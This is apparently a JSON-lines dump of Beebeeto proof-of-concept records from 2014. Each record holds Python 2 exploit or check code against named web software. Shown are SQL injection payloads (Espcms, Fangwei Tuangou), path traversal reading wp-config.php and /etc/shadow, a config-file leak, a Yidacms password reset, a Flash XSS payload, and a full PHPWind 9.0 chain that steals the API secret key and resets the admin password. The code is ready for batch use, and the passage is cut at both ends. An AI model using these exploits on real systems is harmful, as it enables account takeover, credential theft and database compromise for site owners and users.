'Yidacms\u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e', 'asp'],\r\n 'desc': '\u91cd\u7f6e\u5bc6\u7801\u65f6\u6ca1\u6709\u5bf9\u5e10\u53f7\u548c\u539f\u5bc6\u7801\u8fdb\u884c\u6821\u9a8c,\u5bfc\u81f4\u53ef\u4ee5\u4efb\u610f\u91cd\u7f6e\u4efb\u4f55\u7528\u6237\u5bc6\u7801',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-073901',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n vul_path = '%s/user/user.asp?yidacms=password&id=3'\r\n verify_url = vul_path % args['options']['target']\r\n\r\n data = {\r\n 'shuaiweb_userpass':'[email protected]',\r\n 'shuaiweb_userpass2':'[email protected]',\r\n 'shuaiweb_useremail':'[email protected]',\r\n 
'shuaiweb_username': urllib.unquote('%CE%D2%B7%AE%BB%AA'),\r\n 'shuaiweb_usertel': '',\r\n 'shuaiweb_userqq': '',\r\n 'shuaiweb_usermsn': '',\r\n 'shuaiweb_useraddress': ''\r\n }\r\n\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n\r\n response = requests.post(verify_url, data=data)\r\n content = response.content\r\n if u'alert(\\'\u4fee\u6539\u6210\u529f\uff01\\');location.replace(\\'user_pass.asp\\')' in content.decode('GBK'):\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['password'] = '[email protected]'\r\n return args\r\n\r\n\r\n verify = exploit\r\n\r\n\r\nif __name__ == \"__main__\":\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u91cd\u7f6e\u5bc6\u7801\u65f6\u6ca1\u6709\u5bf9\u5e10\u53f7\u548c\u539f\u5bc6\u7801\u8fdb\u884c\u6821\u9a8c,\u5bfc\u81f4\u53ef\u4ee5\u4efb\u610f\u91cd\u7f6e\u4efb\u4f55\u7528\u6237\u5bc6\u7801", "app_name": "yidacms", "id": "poc-2014-0217", "layer4_protocol": null}
{"create_date": "2014-12-22 17:32:12", "name": "Misfortune Cookie(CVE-2014-9222) POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "e3rp4y", "rank": 5, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "Misfortune Cookie,RomPager,\u5384\u8fd0Cookie\u6f0f\u6d1e,CVE-2014-9222", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\nfrom distutils.version import LooseVersion\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0215',\r\n 'name': 'Misfortune Cookie(CVE-2014-9222) POC',\r\n 'author': 'e3rp4y',\r\n 'create_date': '2014-12-22',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Route',\r\n 'vul_version': ['<=4.34'],\r\n 'type': 'Other',\r\n 'tag': ['Misfortune Cookie', 'RomPager', '\u5384\u8fd0Cookie\u6f0f\u6d1e', 'CVE-2014-9222'],\r\n 'desc': '\u653b\u51fb\u8005\u80fd\u591f\u5229\u7528Misfortune Cookie\u6f0f\u6d1e, \u5c06\u5e26\u6709\u653b\u51fb\u8d1f\u8f7d\u7684cookie\u53d1\u9001\u5230\u670d\u52a1\u7aef, \u83b7\u53d6\u7ba1\u7406\u5458\u63a7\u5236\u6743\u9650',\r\n 'references': [\r\n 'http://mis.fortunecook.ie/',\r\n 'https://news.ycombinator.com/item?id=8770662',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = '%s/Allegro' % args['options']['target']\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n ver = re.findall('RomPager Advanced Version (\\d+\\.\\d+)<br>', content)\r\n if ver and '<title>Allegro Copyright</title>' in 
content:\r\n if LooseVersion(ver[0]) < LooseVersion('4.34'):\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u653b\u51fb\u8005\u80fd\u591f\u5229\u7528Misfortune Cookie\u6f0f\u6d1e, \u5c06\u5e26\u6709\u653b\u51fb\u8d1f\u8f7d\u7684cookie\u53d1\u9001\u5230\u670d\u52a1\u7aef, \u83b7\u53d6\u7ba1\u7406\u5458\u63a7\u5236\u6743\u9650", "app_name": "Other", "id": "poc-2014-0215", "layer4_protocol": null}
{"create_date": "2014-12-19 18:54:19", "name": "\u65b9\u7ef4\u56e2\u8d2d v4.3 /app/source/goods_list.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "beebeeto", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u65b9\u7ef4\u56e2\u8d2d4.3\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/app/source/goods_list.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0212',\r\n 'name': '\u65b9\u7ef4\u56e2\u8d2d v4.3 /app/source/goods_list.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'xiangshou',\r\n 'create_date': '2014-12-19',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u65b9\u7ef4\u56e2\u8d2d',\r\n 'vul_version': ['4.3'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['\u65b9\u7ef4\u56e2\u8d2d4.3\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/app/source/goods_list.php', 'php'],\r\n 'desc': '\u65b9\u7ef4\u56e2\u8d2d v4.3 /app/source/goods_list.php\uff0cid\u9020\u6210\u4e86\u6ce8\u5165',\r\n 'references': ['http://sebug.net/vuldb/ssvid-87131',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = \"/index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5%28333%29%29%23\"\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '310dcbbf4cce62f762a2aaa148d556bd' in content:\r\n args['success'] = True\r\n 
args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u65b9\u7ef4\u56e2\u8d2d v4.3 /app/source/goods_list.php\uff0cid\u9020\u6210\u4e86\u6ce8\u5165", "app_name": "\u65b9\u7ef4\u56e2\u8d2d", "id": "poc-2014-0212", "layer4_protocol": null}
{"create_date": "2014-12-18 20:52:06", "name": "eYou v4 /php/report/include/config.inc \u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "beebeeto", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "eYou,\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f,/php/report/include/config.inc,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0211',\r\n 'name': 'eYou v4 /php/report/include/config.inc \u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC',\r\n 'author': 'xiangshou',\r\n 'create_date': '2014-12-18',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'eyou',\r\n 'vul_version': ['4'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['eYou', '\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f', '/php/report/include/config.inc', 'php'],\r\n 'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1a/php/report/include/config.inc',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-058462',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/php/report/include/config.inc'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if 'MYSQL_USER' in content and 'MYSQL_PASS' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url']= verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import 
pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1a/php/report/include/config.inc", "app_name": "eYou", "id": "poc-2014-0211", "layer4_protocol": null}
{"create_date": "2014-12-18 00:53:49", "name": "WordPress DB-Backup Plugin 4.5 /download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "foundu", "rank": 6, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "WordPress DB Backup\u6f0f\u6d1e,CVE-2014-9119,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0209',\r\n 'name': 'WordPress DB-Backup Plugin 4.5 /download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit',\r\n 'author': 'foundu',\r\n 'create_date': '2014-12-18',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'WordPress',\r\n 'vul_version': ['4.5'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['WordPress DB Backup\u6f0f\u6d1e', 'CVE-2014-9119', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', 'php'],\r\n 'desc': '''\r\n DB Backup plugin for WordPress contains a flaw that allows traversing outside of\r\n a restricted path. The issue is due to the download.php script not properly\r\n sanitizing user input, specifically path traversal style attacks (e.g. '../').\r\n With a specially crafted request, a remote attacker can gain read access to\r\n arbitrary files, limited by system operational access control. 
This\r\n vulnerability can be used to get WordPress authentication keys and salts,\r\n database address and credentials, which can be used in certain environments to\r\n elevate privileges and execute malicious PHP code.\r\n\r\n Root cause:\r\n Unsanitized user input to readfile() function.\r\n ''',\r\n 'references': ['http://seclists.org/oss-sec/2014/q4/1059',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n payload = '/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if 'DB_PASSWORD' in content and 'wp-settings.php' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "DB Backup plugin for WordPress contains a flaw that allows traversing outside of\r\na restricted path. The issue is due to the download.php script not properly\r\nsanitizing user input, specifically path traversal style attacks (e.g. '../').\r\nWith a specially crafted request, a remote attacker can gain read access to\r\narbitrary files, limited by system operational access control. This\r\nvulnerability can be used to get WordPress authentication keys and salts,\r\ndatabase address and credentials, which can be used in certain environments to\r\nelevate privileges and execute malicious PHP code.\r\n\r\nRoot cause:\r\nUnsanitized user input to readfile() function.", "app_name": "WordPress", "id": "poc-2014-0209", "layer4_protocol": null}
{"create_date": "2014-12-16 20:04:21", "name": "Espcms v5.0 /index.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "H4rdy", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Espcms 5.0 \u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/index.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0208',\r\n 'name': 'Espcms v5.0 /index.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'H4rdy',\r\n 'create_date': '2014-12-16',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Espcms',\r\n 'vul_version': ['5.0'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['Espcms 5.0 \u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/index.php', 'php'],\r\n 'desc': 'Espcms v5.0 /index.php\uff0ctagkey\u9020\u6210\u4e86\u6ce8\u5165',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2013-019995',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/index.php?ac=search&at=taglist&tagkey=%2527,tags%29%20or%28select%201%20from%28select\"\r\n \"%20count%28*%29,concat%28%28select%20%28select%20concat%28md5%283.1415%29%29%29%20from\"\r\n \"%20information_schema.tables%20where%20table_schema=database%28%29%20limit%200,1%29,\"\r\n \"floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23\")\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n 
content = urllib2.urlopen(req).read()\r\n if \"63e1f04640e83605c1d177544a5a0488\" in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Espcms v5.0 /index.php\uff0ctagkey\u9020\u6210\u4e86\u6ce8\u5165", "app_name": "Espcms", "id": "poc-2014-0208", "layer4_protocol": null}
{"create_date": "2014-12-16 18:28:31", "name": "NS-ASG /commonplugin-Download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "beebeeto", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "NS-ASG\u6f0f\u6d1e,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,/commonplugin-Download.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0207',\r\n 'name': 'NS-ASG /commonplugin-Download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n 'author': 'xiangshou',\r\n 'create_date': '2014-12-15',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'NS-ASG',\r\n 'vul_version': '*',\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['NS-ASG\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', '/commonplugin-Download.php', 'php'],\r\n 'desc': 'N/A',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-058838',\r\n ]\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/commonplugin/Download.php?licensefile=../../../../../../../../../../etc/shadow'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if 'root:' in content and 'nobody:' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif 
__name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "Other", "id": "poc-2014-0207", "layer4_protocol": null}
{"create_date": "2014-12-13 00:54:14", "name": "PHPWind 9.0 /src/windid/service/user/srv/WindidUserService.php \u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 0, "author": "Evi1m0", "rank": 7, "port": null, "vul_type": "\u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539", "tag": "phpwind\u6f0f\u6d1e,\u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e,/WindidUserService.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport time\r\nimport json\r\nimport urllib\r\nimport urllib2\r\n\r\n\r\nfrom hashlib import md5\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0204',\r\n 'name': 'PHPWind 9.0 /src/windid/service/user/srv/WindidUserService.php \u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e POC & Exploit',\r\n 'author': 'Evi1m0',\r\n 'create_date': '2014-12-13',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpwind',\r\n 'vul_version': ['9.0'],\r\n 'type': 'Remote Password Change',\r\n 'tag': ['phpwind\u6f0f\u6d1e', '\u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e', '/WindidUserService.php', 'php'],\r\n 'desc': '''\r\n phpwind v9.0\u7248\u672c\u4e2d\u4e0a\u4f20\u5934\u50cf\u5904\u8bef\u5c06\u8bbf\u95eeapi\u7684\u5bc6\u94a5\u6cc4\u9732\uff0c\u5bfc\u81f4 secretkey \u6cc4\u9732\uff0c\u5bfc\u81f4\u53ef\u901a\u8fc7api\u4efb\u610f\u4fee\u6539\u5bc6\u7801\u3002\r\n ''',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-072727',\r\n ],\r\n },\r\n }\r\n\r\n\r\n # The need for -c (cookie) parameters\r\n def _init_user_parser(self):\r\n 
self.user_parser.add_option('-c','--cookie',\r\n action='store', dest='cookie', type='string', default=None,\r\n help='this poc need to login, so special cookie '\r\n 'for target must be included in http headers.')\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n headers_cookie = {\"Cookie\":args['options']['cookie']}\r\n windidkey_url = '%s/index.php?m=profile&c=avatar&_left=avatar' % url\r\n secretkey_url = '%s/windid/index.php?m=api&c=app&a=list&uid=%s&windidkey=%s&time=%s&clientid=1&type=flash'\r\n # Regex\r\n match_uid = re.compile('m=space&uid=([\\d])+')\r\n match_windidkey = re.compile('windidkey%3D([\\w\\d]{32})%26time%3D([\\d]+)%26')\r\n if args['options']['verbose']:\r\n print '[*] %s - Trying to get secret key' % url\r\n request = urllib2.Request(windidkey_url, headers=headers_cookie)\r\n response = urllib2.urlopen(request).read()\r\n\r\n # Get windidkey\r\n try:\r\n windidkey, _time = match_windidkey.findall(response)[0]\r\n uid = match_uid.findall(response)[0]\r\n except:\r\n return args\r\n\r\n # Get secretkey\r\n request = urllib2.Request(secretkey_url % (url, uid, windidkey, _time), data='uid=undefined')\r\n response = json.loads(urllib2.urlopen(request).read())\r\n try:\r\n secretkey = response['1']['secretkey']\r\n except:\r\n return args\r\n\r\n # Success\r\n if secretkey:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = url\r\n args['poc_ret']['secretkey'] = secretkey\r\n return args\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n url = args['options']['target']\r\n headers_cookie = {\"Cookie\":args['options']['cookie']}\r\n vul_url = '%s/windid/index.php?m=api&c=user&a=%s&windidkey=%s&time=%s&clientid=1&userid=1'\r\n windidkey_url = '%s/index.php?m=profile&c=avatar&_left=avatar' % url\r\n secretkey_url = '%s/windid/index.php?m=api&c=app&a=list&uid=%s&windidkey=%s&time=%s&clientid=1&type=flash'\r\n # Regex\r\n match_uid = re.compile('m=space&uid=([\\d])+')\r\n match_windidkey = 
re.compile('windidkey%3D([\\w\\d]{32})%26time%3D([\\d]+)%26')\r\n if args['options']['verbose']:\r\n print '[*] %s - Trying to get secret key' % url\r\n request = urllib2.Request(windidkey_url, headers=headers_cookie)\r\n response = urllib2.urlopen(request).read()\r\n\r\n # Get windidkey\r\n try:\r\n windidkey, _time = match_windidkey.findall(response)[0]\r\n uid = match_uid.findall(response)[0]\r\n except:\r\n return args\r\n\r\n # Get secretkey\r\n request = urllib2.Request(secretkey_url % (url, uid, windidkey, _time), data='uid=undefined')\r\n response = json.loads(urllib2.urlopen(request).read())\r\n try:\r\n secretkey = response['1']['secretkey']\r\n except:\r\n return args\r\n if args['options']['verbose']:\r\n print '[*] %s - The secret key is %s' % (url, secretkey)\r\n\r\n # Get username\r\n if args['options']['verbose']:\r\n print '[*] %s - Getting Username ...' % url\r\n data = {'uid': 1}\r\n string = 'userid1uid1'\r\n _time = str(int(time.time()))\r\n app_key = md5('%s%s%s' % (md5('1||%s' % secretkey).hexdigest(), _time, string)).hexdigest()\r\n request = urllib2.Request(vul_url % (url, 'get', app_key, _time), data=urllib.urlencode(data))\r\n response = json.loads(urllib2.urlopen(request).read())\r\n try:\r\n username = response[u'username']\r\n except:\r\n return args\r\n if args['options']['verbose']:\r\n print '[*] %s - The Username is %s' % (url, username)\r\n\r\n # Change password\r\n if args['options']['verbose']:\r\n print '[*] %s - Trying to change the %s\\'s password ...' 
% (url ,username)\r\n data = {'password': 'PASSW0RD', 'uid': 1}\r\n string = 'userid1passwordPASSW0RDuid1'\r\n _time = str(int(time.time()))\r\n app_key = md5('%s%s%s' % (md5('1||%s' % secretkey).hexdigest(), _time, string)).hexdigest()\r\n request = urllib2.Request(vul_url % (url, 'editUser', app_key, _time), data=urllib.urlencode(data))\r\n response = urllib2.urlopen(request).read()\r\n\r\n # Success\r\n if response == '1':\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = url\r\n args['poc_ret']['secretkey'] = secretkey\r\n args['poc_ret']['username'] = username\r\n args['poc_ret']['password'] = 'PASSW0RD'\r\n return args\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "phpwind v9.0\u7248\u672c\u4e2d\u4e0a\u4f20\u5934\u50cf\u5904\u8bef\u5c06\u8bbf\u95eeapi\u7684\u5bc6\u94a5\u6cc4\u9732\uff0c\u5bfc\u81f4 secretkey \u6cc4\u9732\uff0c\u5bfc\u81f4\u53ef\u901a\u8fc7api\u4efb\u610f\u4fee\u6539\u5bc6\u7801\u3002", "app_name": "PHPWind", "id": "poc-2014-0204", "layer4_protocol": null}
{"create_date": "2014-12-11 01:09:34", "name": "phpwind 9.0 /res/js/dev/util_libs/jPlayer/Jplayer.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "phpwind\u6f0f\u6d1e,xss\u6f0f\u6d1e,flash xss,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0201',\r\n 'name': 'phpwind 9.0 /res/js/dev/util_libs/jPlayer/Jplayer.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2014-12-11',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpwind',\r\n 'vul_version': ['9.0'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['phpwind\u6f0f\u6d1e', 'xss\u6f0f\u6d1e', 'flash xss', 'php'],\r\n 'desc': 'N/A',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2013-017733',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n flash_md5 = \"769d053b03973d380da80be5a91c59c2\"\r\n file_path = \"/res/js/dev/util_libs/jPlayer/Jplayer.swf\"\r\n verify_url = args['options']['target'] + file_path\r\n\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n md5_value = md5.new(content).hexdigest()\r\n\r\n if md5_value in flash_md5:\r\n args['success'] = True\r\n args['poc_ret']['xss_url'] = verify_url + '?jQuery=alert(1))}catch(e){}//'\r\n return args\r\n return 
